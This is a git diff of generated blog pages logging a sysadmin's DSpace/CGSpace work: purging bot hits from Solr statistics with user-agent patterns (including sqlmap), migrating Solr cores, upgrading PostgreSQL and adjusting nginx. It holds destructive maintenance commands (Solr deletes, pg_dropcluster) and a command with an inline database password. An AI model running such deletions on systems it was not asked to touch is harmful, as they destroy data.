+<pre tabindex="0"><code>LinkedInBot/1.0 (compatible; Mozilla/5.0; Jakarta Commons-HttpClient/4.3
+EventMachine HttpClient
+ecolink (+https://search.ecointernet.org/)
+ecoweb (+https://search.ecointernet.org/)
+EcoInternet http://www.ecointernet.org/
+EcoInternet http://ecointernet.org/
+Biosphere EcoSearch http://search.ecointernet.org/
+Typhoeus - https://github.com/typhoeus/typhoeus
+Citoid (Wikimedia tool; learn more at https://www.mediawiki.org/wiki/Citoid)
+node-fetch/1.0 (+https://github.com/bitinn/node-fetch)
+7Siters/1.08 (+https://7ooo.ru/siters/)
+sqlmap/1.0-dev-nongit-20190527 (http://sqlmap.org)
+sqlmap/1.3.4.14#dev (http://sqlmap.org)
+lua-resty-http/0.10 (Lua) ngx_lua/10000
+omgili/0.5 +http://omgili.com
+IZaBEE/IZaBEE-1.01 (Buzzing Abound The Web; https://izabee.com; info at izabee dot com)
+Twurly v1.1 (https://twurly.org)
+okhttp/3.11.0
+okhttp/3.10.0
+Pattern/2.6 +http://www.clips.ua.ac.be/pattern
+Link Check; EPrints 3.3.x;
+CyotekWebCopy/1.7 CyotekHTTP/2.0
+Adestra Link Checker: http://www.adestra.co.uk
+HTTPie/1.0.2
+</code></pre><ul>
+<li>I notice that some of these would be matched by the COUNTER-Robots list when DSpace uses it in Java because there we have more robust (and case-insensitive) matching
+<ul>
+<li>I created a temporary file of some of the patterns and converted them to use capitalization so I could run them through <code>check-spider-hits.sh</code></li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>Link.?Check
+Http.?Client
+ecointernet
+</code></pre><ul>
+<li>That removes another 500,000 or so:</li>
+</ul>
+<pre tabindex="0"><code>$ ./check-spider-hits.sh -u http://localhost:8081/solr -f /tmp/agents -s statistics -p
+Purging 253 hits from Jersey\/[0-9] in statistics
+Purging 7302 hits from Link.?Check in statistics
+Purging 85574 hits from Http.?Client in statistics
+Purging 495 hits from HTTPie\/[0-9] in statistics
+Purging 56726 hits from ecointernet in statistics
+
+Total number of bot hits purged: 150350
+$ ./check-spider-hits.sh -u http://localhost:8081/solr -f /tmp/agents -s statistics-2018 -p
+Purging 3442 hits from Link.?Check in statistics-2018
+Purging 21922 hits from Http.?Client in statistics-2018
+Purging 2120 hits from HTTPie\/[0-9] in statistics-2018
+Purging 10 hits from ecointernet in statistics-2018
+
+Total number of bot hits purged: 27494
+$ ./check-spider-hits.sh -u http://localhost:8081/solr -f /tmp/agents -s statistics-2017 -p
+Purging 6416 hits from Link.?Check in statistics-2017
+Purging 403402 hits from Http.?Client in statistics-2017
+Purging 12 hits from HTTPie\/[0-9] in statistics-2017
+Purging 6 hits from ecointernet in statistics-2017
+
+Total number of bot hits purged: 409836
+$ ./check-spider-hits.sh -u http://localhost:8081/solr -f /tmp/agents -s statistics-2016 -p
+Purging 2348 hits from Link.?Check in statistics-2016
+Purging 225664 hits from Http.?Client in statistics-2016
+Purging 15 hits from HTTPie\/[0-9] in statistics-2016
+
+Total number of bot hits purged: 228027
+$ ./check-spider-hits.sh -u http://localhost:8081/solr -f /tmp/agents -s statistics-2015 -p
+Purging 3459 hits from Link.?Check in statistics-2015
+Purging 263 hits from Http.?Client in statistics-2015
+Purging 15 hits from HTTPie\/[0-9] in statistics-2015
+
+Total number of bot hits purged: 3737
+$ ./check-spider-hits.sh -u http://localhost:8081/solr -f /tmp/agents -s statistics-2014 -p
+Purging 5 hits from Link.?Check in statistics-2014
+Purging 8 hits from Http.?Client in statistics-2014
+Purging 4 hits from HTTPie\/[0-9] in statistics-2014
+
+Total number of bot hits purged: 17
+$ ./check-spider-hits.sh -u http://localhost:8081/solr -f /tmp/agents -s statistics-2011 -p
+Purging 159 hits from Http.?Client in statistics-2011
+
+Total number of bot hits purged: 159
+</code></pre><ul>
+<li>Make pull requests for issues with user agents in the COUNTER-Robots repository:
+<ul>
+<li><a href="https://github.com/atmire/COUNTER-Robots/pull/33">Fix okhttp</a></li>
+<li><a href="https://github.com/atmire/COUNTER-Robots/pull/34">Add new bots</a></li>
+</ul>
+</li>
+<li>One benefit of all this is that the size of the statistics Solr core has reduced by 6GiB since yesterday, though I can&rsquo;t remember how big it was before that
+<ul>
+<li>According to my notes it was 43GiB in January when it failed the first time</li>
+<li>I wonder if the sharding process would work now&hellip;</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-02-26">2020-02-26</h2>
+<ul>
+<li>Bosede finally got back to me about the IITA records from earlier last month (<a href="https://dspacetest.cgiar.org/handle/10568/106567">IITA_201907_Jan13</a>)
+<ul>
+<li>She said she has added more information to fifty-three of the journal articles, as I had requested</li>
+</ul>
+</li>
+<li>I tried to migrate the 2019 Solr statistics again on CGSpace because the automatic sharding failed last month:</li>
+</ul>
+<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx512m&#34;
+$ schedtool -D -e ionice -c2 -n7 dspace stats-util -s &gt;&gt; log/cron-stats-util.log.$(date --iso-8601)
+</code></pre><ul>
+<li>Interestingly I saw this in the Solr log:</li>
+</ul>
+<pre tabindex="0"><code>2020-02-26 08:55:47,433 INFO  org.apache.solr.core.SolrCore @ [statistics-2019] Opening new SolrCore at [dspace]/solr/statistics/, dataDir=[dspace]/solr/statistics-2019/data/
+2020-02-26 08:55:47,511 INFO  org.apache.solr.servlet.SolrDispatchFilter @ [admin] webapp=null path=/admin/cores params={dataDir=[dspace]/solr/statistics-2019/data&amp;name=statistics-2019&amp;action=CREATE&amp;instanceDir=statistics&amp;wt=javabin&amp;version=2} status=0 QTime=590
+</code></pre><ul>
+<li>The process has been going for several hours now and I suspect it will fail eventually
+<ul>
+<li>I want to explore manually creating and migrating the core</li>
+</ul>
+</li>
+<li>Manually create a core in the DSpace 6.4-SNAPSHOT instance on my local environment:</li>
+</ul>
+<pre tabindex="0"><code>$ curl &#39;http://localhost:8080/solr/admin/cores?action=CREATE&amp;name=statistics-2019&amp;instanceDir=/home/aorth/dspace63/solr/statistics&amp;dataDir=/home/aorth/dspace63/solr/statistics-2019/data&#39;
+</code></pre><ul>
+<li>After that the <code>statistics-2019</code> core was immediately available in the Solr UI, but after restarting Tomcat it was gone
+<ul>
+<li>I wonder if I import some old statistics into the current <code>statistics</code> core and then let DSpace create the <code>statistics-2019</code> core itself using <code>dspace stats-util -s</code> will work&hellip;</li>
+</ul>
+</li>
+<li>First export a small slice of 2019 stats from the main CGSpace <code>statistics</code> core, skipping Atmire schema additions:</li>
+</ul>
+<pre tabindex="0"><code>$ ./run.sh -s http://localhost:8081/solr/statistics -a export -o /tmp/statistics-2019-01-16.json -f &#39;time:2019-01-16*&#39; -k uid -S author_mtdt,author_mtdt_search,iso_mtdt_search,iso_mtdt,subject_mtdt,subject_mtdt_search,containerCollection,containerCommunity,containerItem,countryCode_ngram,countryCode_search,cua_version,dateYear,dateYearMonth,geoipcountrycode,ip_ngram,ip_search,isArchived,isInternal,isWithdrawn,containerBitstream,file_id,referrer_ngram,referrer_search,userAgent_ngram,userAgent_search,version_id,complete_query,complete_query_search,filterquery,ngram_query_search,ngram_simplequery_search,simple_query,simple_query_search,range,rangeDescription,rangeDescription_ngram,rangeDescription_search,range_ngram,range_search,actingGroupId,actorMemberGroupId,bitstreamCount,solr_update_time_stamp,bitstreamId
+</code></pre><ul>
+<li>Then import into my local <code>statistics</code> core:</li>
+</ul>
+<pre tabindex="0"><code>$ ./run.sh -s http://localhost:8080/solr/statistics -a import -o ~/Downloads/statistics-2019-01-16.json -k uid
+$ ~/dspace63/bin/dspace stats-util -s
+Moving: 21993 into core statistics-2019
+</code></pre><ul>
+<li>To my surprise, the <code>statistics-2019</code> core is created and the documents are immediately visible in the Solr UI!
+<ul>
+<li>Also, I am able to see the stats in DSpace&rsquo;s default &ldquo;View Usage Statistics&rdquo; screen</li>
+<li>Items appear with the words &ldquo;(legacy)&rdquo; at the end, ie &ldquo;Improving farming practices in flood-prone areas in the Solomon Islands(legacy)&rdquo;</li>
+<li>Interestingly, if I make a bunch of requests for that item they will not be recognized as the same item, showing up as &ldquo;Improving farming practices in flood-prone areas in the Solomon Islands&rdquo; without the the legacy identifier</li>
+<li>I need to remember to test out the <a href="https://wiki.lyrasis.org/display/DSDOC6x/SOLR+Statistics+Maintenance#SOLRStatisticsMaintenance-UpgradeLegacyDSpaceObjectIdentifiers(pre-6xstatistics)toDSpace6xUUIDIdentifiers">SolrUpgradePre6xStatistics tool</a></li>
+</ul>
+</li>
+<li>After restarting my local Tomcat on DSpace 6.4-SNAPSHOT the <code>statistics-2019</code> core loaded up&hellip;
+<ul>
+<li>I wonder what the difference is between the core I created vs the one created by <code>stats-util</code>?</li>
+<li>I&rsquo;m honestly considering just moving everything back into one core&hellip;</li>
+<li>Or perhaps I can export all the stats for 2019 by month, then delete everything, re-import each month, and migrate them with stats-util</li>
+</ul>
+</li>
+<li>A few hours later the sharding has completed successfully so I guess I don&rsquo;t have to worry about this any more for now, though I&rsquo;m seriously considering moving all my data back into the one statistics core</li>
+<li>Testing some <a href="https://wiki.lyrasis.org/display/DSPACE/DSpace+6.4+Release+Status">proposed patches for 6.4</a> in my local <code>6_x-dev64</code> branch</li>
+<li><a href="https://jira.lyrasis.org/browse/DS-4135">DS-4135 (citation author UTF-8)</a>
+<ul>
+<li>Testing <a href="https://hdl.handle.net/10568/106959">item 10568/106959</a> before and after:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>&lt;meta content=&#34;Thu hoạch v&amp;agrave; bảo quản c&amp;agrave; ph&amp;ecirc; ch&amp;egrave; đ&amp;uacute;ng kỹ thuật (Harvesting and storing Arabica coffee)&#34; name=&#34;citation_title&#34;&gt;
+&lt;meta name=&#34;citation_title&#34; content=&#34;Thu hoạch và bảo quản cà phê chè đúng kỹ thuật (Harvesting and storing Arabica coffee)&#34; /&gt;
+</code></pre><ul>
+<li><a href="https://jira.lyrasis.org/browse/DS-4397">DS-4397 controlled vocabulary loading speedup</a></li>
+</ul>
+<h2 id="2020-02-27">2020-02-27</h2>
+<ul>
+<li>Tezira startd a discussion on Yammer about the ISI Journal field
+<ul>
+<li>She and Abenet both insist that selecting <code>N/A</code> for the &ldquo;Journal status&rdquo; in the submission form makes the item show <!-- raw HTML omitted -->ISI Journal<!-- raw HTML omitted --> on the item display page</li>
+<li>I told them that the <code>N/A</code> does not store a value so this is impossible</li>
+<li>I tested it to be sure on DSpace Test, and it does not show a value&hellip;</li>
+<li>I checked this morning&rsquo;s database snapshot and found three items that had a value of <code>N/A</code>, but they have already been fixed manually on CGSpace by Abenet or Tezira</li>
+<li>I re-worded the <code>N/A</code> to say &ldquo;Non-ISI Journal&rdquo; in the submission form, though it still does not store a value</li>
+</ul>
+</li>
+<li>I tested the one last remaining issue with our <code>6.x-dev</code> branch: the export CSV from search results
+<ul>
+<li>Last time I had tried that it didn&rsquo;t work for some reason</li>
+<li>Now I will <a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=706">tell Atmire to get started</a></li>
+</ul>
+</li>
+<li>I added some debugging to the Solr core loading in DSpace 6.4-SNAPSHOT (<code>SolrLoggerServiceImpl.java</code>) and I see this when DSpace starts up now:</li>
+</ul>
+<pre tabindex="0"><code>2020-02-27 12:26:35,695 INFO  org.dspace.statistics.SolrLoggerServiceImpl @ Alan Ping of Solr Core [statistics-2019] Failed with [org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException].  New Core Will be Created
+</code></pre><ul>
+<li>When I check Solr I see the <code>statistics-2019</code> core loaded (from <code>stats-util -s</code> yesterday, not manually created)</li>
+</ul>
+<!-- raw HTML omitted -->
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2020-03/index.html b/docs/2020-03/index.html
new file mode 100644
index 000000000..5f820c225
--- /dev/null
+++ b/docs/2020-03/index.html
@@ -0,0 +1,538 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="March, 2020" />
+<meta property="og:description" content="2020-03-02
+
+Update dspace-statistics-api for DSpace 6&#43; UUIDs
+
+Tag version 1.2.0 on GitHub
+
+
+Test migrating legacy Solr statistics to UUIDs with the as-of-yet unreleased SolrUpgradePre6xStatistics.java
+
+You need to download this into the DSpace 6.x source and compile it
+
+
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2020-03/" />
+<meta property="article:published_time" content="2020-03-02T12:31:30+02:00" />
+<meta property="article:modified_time" content="2020-04-02T12:33:41+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="March, 2020"/>
+<meta name="twitter:description" content="2020-03-02
+
+Update dspace-statistics-api for DSpace 6&#43; UUIDs
+
+Tag version 1.2.0 on GitHub
+
+
+Test migrating legacy Solr statistics to UUIDs with the as-of-yet unreleased SolrUpgradePre6xStatistics.java
+
+You need to download this into the DSpace 6.x source and compile it
+
+
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "March, 2020",
+  "url": "https://alanorth.github.io/cgspace-notes/2020-03/",
+  "wordCount": "2001",
+  "datePublished": "2020-03-02T12:31:30+02:00",
+  "dateModified": "2020-04-02T12:33:41+03:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2020-03/">
+
+    <title>March, 2020 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2020-03/">March, 2020</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2020-03-02T12:31:30+02:00">Mon Mar 02, 2020</time>
+ in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2020-03-02">2020-03-02</h2>
+<ul>
+<li>Update <a href="https://github.com/ilri/dspace-statistics-api">dspace-statistics-api</a> for DSpace 6+ UUIDs
+<ul>
+<li>Tag version 1.2.0 on GitHub</li>
+</ul>
+</li>
+<li>Test migrating legacy Solr statistics to UUIDs with the as-of-yet unreleased <a href="https://github.com/DSpace/DSpace/commit/184f2b2153479045fba6239342c63e7f8564b8b6#diff-0350ce2e13b28d5d61252b7a8f50a059">SolrUpgradePre6xStatistics.java</a>
+<ul>
+<li>You need to download this into the DSpace 6.x source and compile it</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34;
+$ ~/dspace63/bin/dspace solr-upgrade-statistics-6x
+</code></pre><h2 id="2020-03-03">2020-03-03</h2>
+<ul>
+<li>Skype with Peter and Abenet to discuss the CG Core survey
+<ul>
+<li>We also discussed some other CGSpace issues</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-03-04">2020-03-04</h2>
+<ul>
+<li>Abenet asked me to add some new ILRI subjects to CGSpace
+<ul>
+<li>I <a href="https://github.com/ilri/DSpace/commit/b51a242e773bd8658d3cab4ac883975708b00386">updated the input-forms.xml</a> in our <code>5_x-prod</code> branch on GitHub</li>
+<li>Abenet said we are changing <code>HEALTH</code> to <code>HUMAN HEALTH</code> so I need to fix those using my <code>fix-metadata-values.py</code> script:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2020-03-04-fix-1-ilri-subject.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.subject.ilri -m 203 -t correct -d
+</code></pre><ul>
+<li>But I have not run it on CGSpace yet because we want to ask Peter if he is sure about it&hellip;</li>
+<li>Send a message to Macaroni Bros to ask them about their Drupal module and its readiness for DSpace 6 UUIDs</li>
+</ul>
+<h2 id="2020-03-05">2020-03-05</h2>
+<ul>
+<li>I found a very <a href="https://lucene.apache.org/solr/guide/8_1/solr-system-requirements.html#lucene-solr-prior-to-7-0">interesting comment on the Solr 8.1 guide</a> about Java compatibility:</li>
+</ul>
+<blockquote>
+<p>Lucene/Solr 7.0 was the first version that successfully passed our tests using Java 9 and higher. You should avoid Java 9 or later for Lucene/Solr 6.x or earlier.</p>
+</blockquote>
+<h2 id="2020-03-08">2020-03-08</h2>
+<ul>
+<li>I want to try to consolidate our yearly Solr statistics cores back into one <code>statistics</code> core using the solr-import-export-json tool</li>
+<li>I will try it on DSpace test, doing one year at a time:</li>
+</ul>
+<pre tabindex="0"><code>$ ./run.sh -s http://localhost:8081/solr/statistics-2010 -a export -o /tmp/statistics-2010.json -k uid
+$ ./run.sh -s http://localhost:8081/solr/statistics -a import -o /tmp/statistics-2010.json -k uid
+$ curl -s &#34;http://localhost:8081/solr/statistics-2010/update?softCommit=true&#34; -H &#34;Content-Type: text/xml&#34; --data-binary &#34;&lt;delete&gt;&lt;query&gt;time:2010*&lt;/query&gt;&lt;/delete&gt;&#34;
+$ ./run.sh -s http://localhost:8081/solr/statistics-2011 -a export -o /tmp/statistics-2011.json -k uid
+$ ./run.sh -s http://localhost:8081/solr/statistics -a import -o /tmp/statistics-2011.json -k uid
+$ curl -s &#34;http://localhost:8081/solr/statistics-2011/update?softCommit=true&#34; -H &#34;Content-Type: text/xml&#34; --data-binary &#34;&lt;delete&gt;&lt;query&gt;time:2011*&lt;/query&gt;&lt;/delete&gt;&#34;
+$ ./run.sh -s http://localhost:8081/solr/statistics -a import -o /tmp/statistics-2012.json -k uid
+$ curl -s &#39;http://localhost:8081/solr/statistics/select?q=time:2012*&amp;rows=0&amp;wt=json&amp;indent=true&#39; | grep numFound
+  &#34;response&#34;:{&#34;numFound&#34;:3761989,&#34;start&#34;:0,&#34;docs&#34;:[]
+$ curl -s &#39;http://localhost:8081/solr/statistics-2012/select?q=time:2012*&amp;rows=0&amp;wt=json&amp;indent=true&#39; | grep numFound
+  &#34;response&#34;:{&#34;numFound&#34;:3761989,&#34;start&#34;:0,&#34;docs&#34;:[]
+$ curl -s &#34;http://localhost:8081/solr/statistics-2012/update?softCommit=true&#34; -H &#34;Content-Type: text/xml&#34; --data-binary &#34;&lt;delete&gt;&lt;query&gt;time:2012*&lt;/query&gt;&lt;/delete&gt;&#34;
+</code></pre><ul>
+<li>I will do this for as many cores as I can (disk space limited) and then monitor the effect on the system and JVM memory usage
+<ul>
+<li>Exporting half years might work, using a filter query with months as a regular expression:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ ./run.sh -s http://localhost:8081/solr/statistics-2014 -a export -o /tmp/statistics-2014-1.json -k uid -f &#39;time:/2014-0[1-6].*/&#39;
+</code></pre><ul>
+<li>Upgrade PostgreSQL from 9.6 to 10 on DSpace Test (linode19)
+<ul>
+<li>I&rsquo;ve been running it for one month in my local environment, and others have reported on the dspace-tech mailing list that they are using 10 and 11</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code># apt install postgresql-10 postgresql-contrib-10
+# systemctl stop tomcat7
+# pg_ctlcluster 9.6 main stop
+# tar -cvzpf var-lib-postgresql-9.6.tar.gz /var/lib/postgresql/9.6
+# tar -cvzpf etc-postgresql-9.6.tar.gz /etc/postgresql/9.6
+# pg_ctlcluster 10 main stop
+# pg_dropcluster 10 main
+# pg_upgradecluster 9.6 main
+# pg_dropcluster 9.6 main
+# dpkg -l | grep postgresql | grep 9.6 | awk &#39;{print $2}&#39; | xargs dpkg -r
+</code></pre><h2 id="2020-03-09">2020-03-09</h2>
+<ul>
+<li>Peter noticed that the Solr stats were not showing anything before 2020
+<ul>
+<li>I had to restart Tomcat three times before all cores loaded properly&hellip;</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-03-10">2020-03-10</h2>
+<ul>
+<li>Fix some logic issues in the nginx config
+<ul>
+<li>Use generic blocking of <code>[Bb]ot</code> and <code>[Cc]rawl</code> and <code>[Ss]pider</code> in the &ldquo;badbots&rdquo; rate limiting logic instead of trying to list them all one by one (bots should not be trying to index dynamic pages <em>no matter what</em> so we punish hard here)</li>
+<li>We were not properly forwarding the remote IP address to Tomcat in all nginx location blocks, which led some locations to log a hit from 127.0.0.1 (because we need to explicitly add the global proxy params when setting other headers in location blocks)</li>
+<li>Unfortunately this affected the REST API and there are a few hundred thousand requests from this user agent:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 (.NET CLR 3.5.30729)
+</code></pre><ul>
+<li>It seems to only be a problem in the last week:</li>
+</ul>
+<pre tabindex="0"><code># zgrep -c 64.225.40.66 /var/log/nginx/rest.log.{1..9}
+/var/log/nginx/rest.log.1:0
+/var/log/nginx/rest.log.2:0
+/var/log/nginx/rest.log.3:0
+/var/log/nginx/rest.log.4:3625
+/var/log/nginx/rest.log.5:27458
+/var/log/nginx/rest.log.6:0
+/var/log/nginx/rest.log.7:0
+/var/log/nginx/rest.log.8:0
+/var/log/nginx/rest.log.9:0
+</code></pre><ul>
+<li>In Solr the IP is 127.0.0.1, but in the nginx logs I can luckily see the real IP (64.225.40.66), which is on Digital Ocean</li>
+<li>I will purge them from Solr statistics:</li>
+</ul>
+<pre tabindex="0"><code>$ curl -s &#34;http://localhost:8081/solr/statistics/update?softCommit=true&#34; -H &#34;Content-Type: text/xml&#34; --data-binary &#39;&lt;delete&gt;&lt;query&gt;userAgent:&#34;Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 (.NET CLR 3.5.30729)&#34;&lt;/query&gt;&lt;/delete&gt;&#39;
+</code></pre><ul>
+<li>Another user agent that seems to be a bot is:</li>
+</ul>
+<pre tabindex="0"><code>Mozilla/5.0 ((Windows; U; Windows NT 6.1; fr; rv:1.9.2) Gecko/20100115 Firefox/3.6)
+</code></pre><ul>
+<li>In Solr the IP is 127.0.0.1 because of the misconfiguration, but in nginx&rsquo;s logs I see it belongs to three IPs on Online.net in France:</li>
+</ul>
+<pre tabindex="0"><code># zcat /var/log/nginx/access.log.*.gz /var/log/nginx/rest.log.*.gz | grep &#39;Mozilla/5.0 ((Windows; U; Windows NT 6.1; fr; rv:1.9.2) Gecko/20100115 Firefox/3.6)&#39; | awk &#39;{print $1}&#39; | sort | uniq -c
+  63090 163.172.68.99
+ 183428 163.172.70.248
+ 147608 163.172.71.24
+</code></pre><ul>
+<li>It is making 10,000 to 40,000 requests to XMLUI per day&hellip;</li>
+</ul>
+<pre tabindex="0"><code># zgrep -c &#39;Mozilla/5.0 ((Windows; U; Windows NT 6.1; fr; rv:1.9.2) Gecko/20100115 Firefox/3.6)&#39; /var/log/nginx/access.log.{1..9}
+/var/log/nginx/access.log.30.gz:18687
+/var/log/nginx/access.log.31.gz:28936
+/var/log/nginx/access.log.32.gz:36402
+/var/log/nginx/access.log.33.gz:38886
+/var/log/nginx/access.log.34.gz:30607
+/var/log/nginx/access.log.35.gz:19040
+/var/log/nginx/access.log.36.gz:10780
+/var/log/nginx/access.log.37.gz:5808
+/var/log/nginx/access.log.38.gz:3100
+/var/log/nginx/access.log.39.gz:1485
+/var/log/nginx/access.log.3.gz:2898
+/var/log/nginx/access.log.40.gz:373
+/var/log/nginx/access.log.41.gz:3909
+/var/log/nginx/access.log.42.gz:4729
+/var/log/nginx/access.log.43.gz:3906
+</code></pre><ul>
+<li>I will purge those hits too!</li>
+</ul>
+<pre tabindex="0"><code>$ curl -s &#34;http://localhost:8081/solr/statistics/update?softCommit=true&#34; -H &#34;Content-Type: text/xml&#34; --data-binary &#39;&lt;delete&gt;&lt;query&gt;userAgent:&#34;Mozilla/5.0 ((Windows; U; Windows NT 6.1; fr; rv:1.9.2) Gecko/20100115 Firefox/3.6)&#34;&lt;/query&gt;&lt;/delete&gt;&#39;
+</code></pre><ul>
+<li>Shit, and something happened and a few thousand hits from user agents with &ldquo;Bot&rdquo; in their user agent got through
+<ul>
+<li>I need to re-run the <code>check-bot-hits.sh</code> script with the standard COUNTER-Robots list again, but add my own versions of a few because the script/Solr doesn&rsquo;t support case-insensitive regular expressions:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ ./check-spider-hits.sh -f /tmp/bots -d -p
+(DEBUG) Using spiders pattern file: /tmp/bots
+(DEBUG) Checking for hits from spider: Citoid
+Purging 11 hits from Citoid in statistics
+(DEBUG) Checking for hits from spider: ecointernet
+Purging 375 hits from ecointernet in statistics
+(DEBUG) Checking for hits from spider: ^Pattern\/[0-9]
+Purging 1 hits from ^Pattern\/[0-9] in statistics
+(DEBUG) Checking for hits from spider: sqlmap
+(DEBUG) Checking for hits from spider: Typhoeus
+Purging 6 hits from Typhoeus in statistics
+(DEBUG) Checking for hits from spider: 7siters
+(DEBUG) Checking for hits from spider: Apache-HttpClient
+Purging 3178 hits from Apache-HttpClient in statistics
+
+Total number of bot hits purged: 3571
+
+$ ./check-spider-hits.sh -f /tmp/bots -d -p
+(DEBUG) Using spiders pattern file: /tmp/bots
+(DEBUG) Checking for hits from spider: [Bb]ot
+Purging 8317 hits from [Bb]ot in statistics
+(DEBUG) Checking for hits from spider: [Cc]rawl
+Purging 1314 hits from [Cc]rawl in statistics
+(DEBUG) Checking for hits from spider: [Ss]pider
+Purging 62 hits from [Ss]pider in statistics
+(DEBUG) Checking for hits from spider: Citoid
+(DEBUG) Checking for hits from spider: ecointernet
+(DEBUG) Checking for hits from spider: ^Pattern\/[0-9]
+(DEBUG) Checking for hits from spider: sqlmap
+(DEBUG) Checking for hits from spider: Typhoeus
+(DEBUG) Checking for hits from spider: 7siters
+(DEBUG) Checking for hits from spider: Apache-HttpClient
+</code></pre><h2 id="2020-03-11">2020-03-11</h2>
+<ul>
+<li>Ask Michael Victor for permission to create a new Linode server for DSpace Test</li>
+</ul>
+<h2 id="2020-3-12">2020-3-12</h2>
+<ul>
+<li>I&rsquo;m working on the 170 IITA records on <a href="https://dspacetest.cgiar.org/handle/10568/106567">DSpace Test</a> from January finally
+<ul>
+<li>It&rsquo;s been two months since I last looked and I want to do a thorough check to make sure Bosede didn&rsquo;t introduce any new issues, but I want to consolidate all the text languages for these records so it&rsquo;s easier to check them in OpenRefine</li>
+<li>First I got a list of IDs from <code>csvcut</code> and then I updated the text languages for only those records:</li>
+</ul>
+</li>
+</ul>
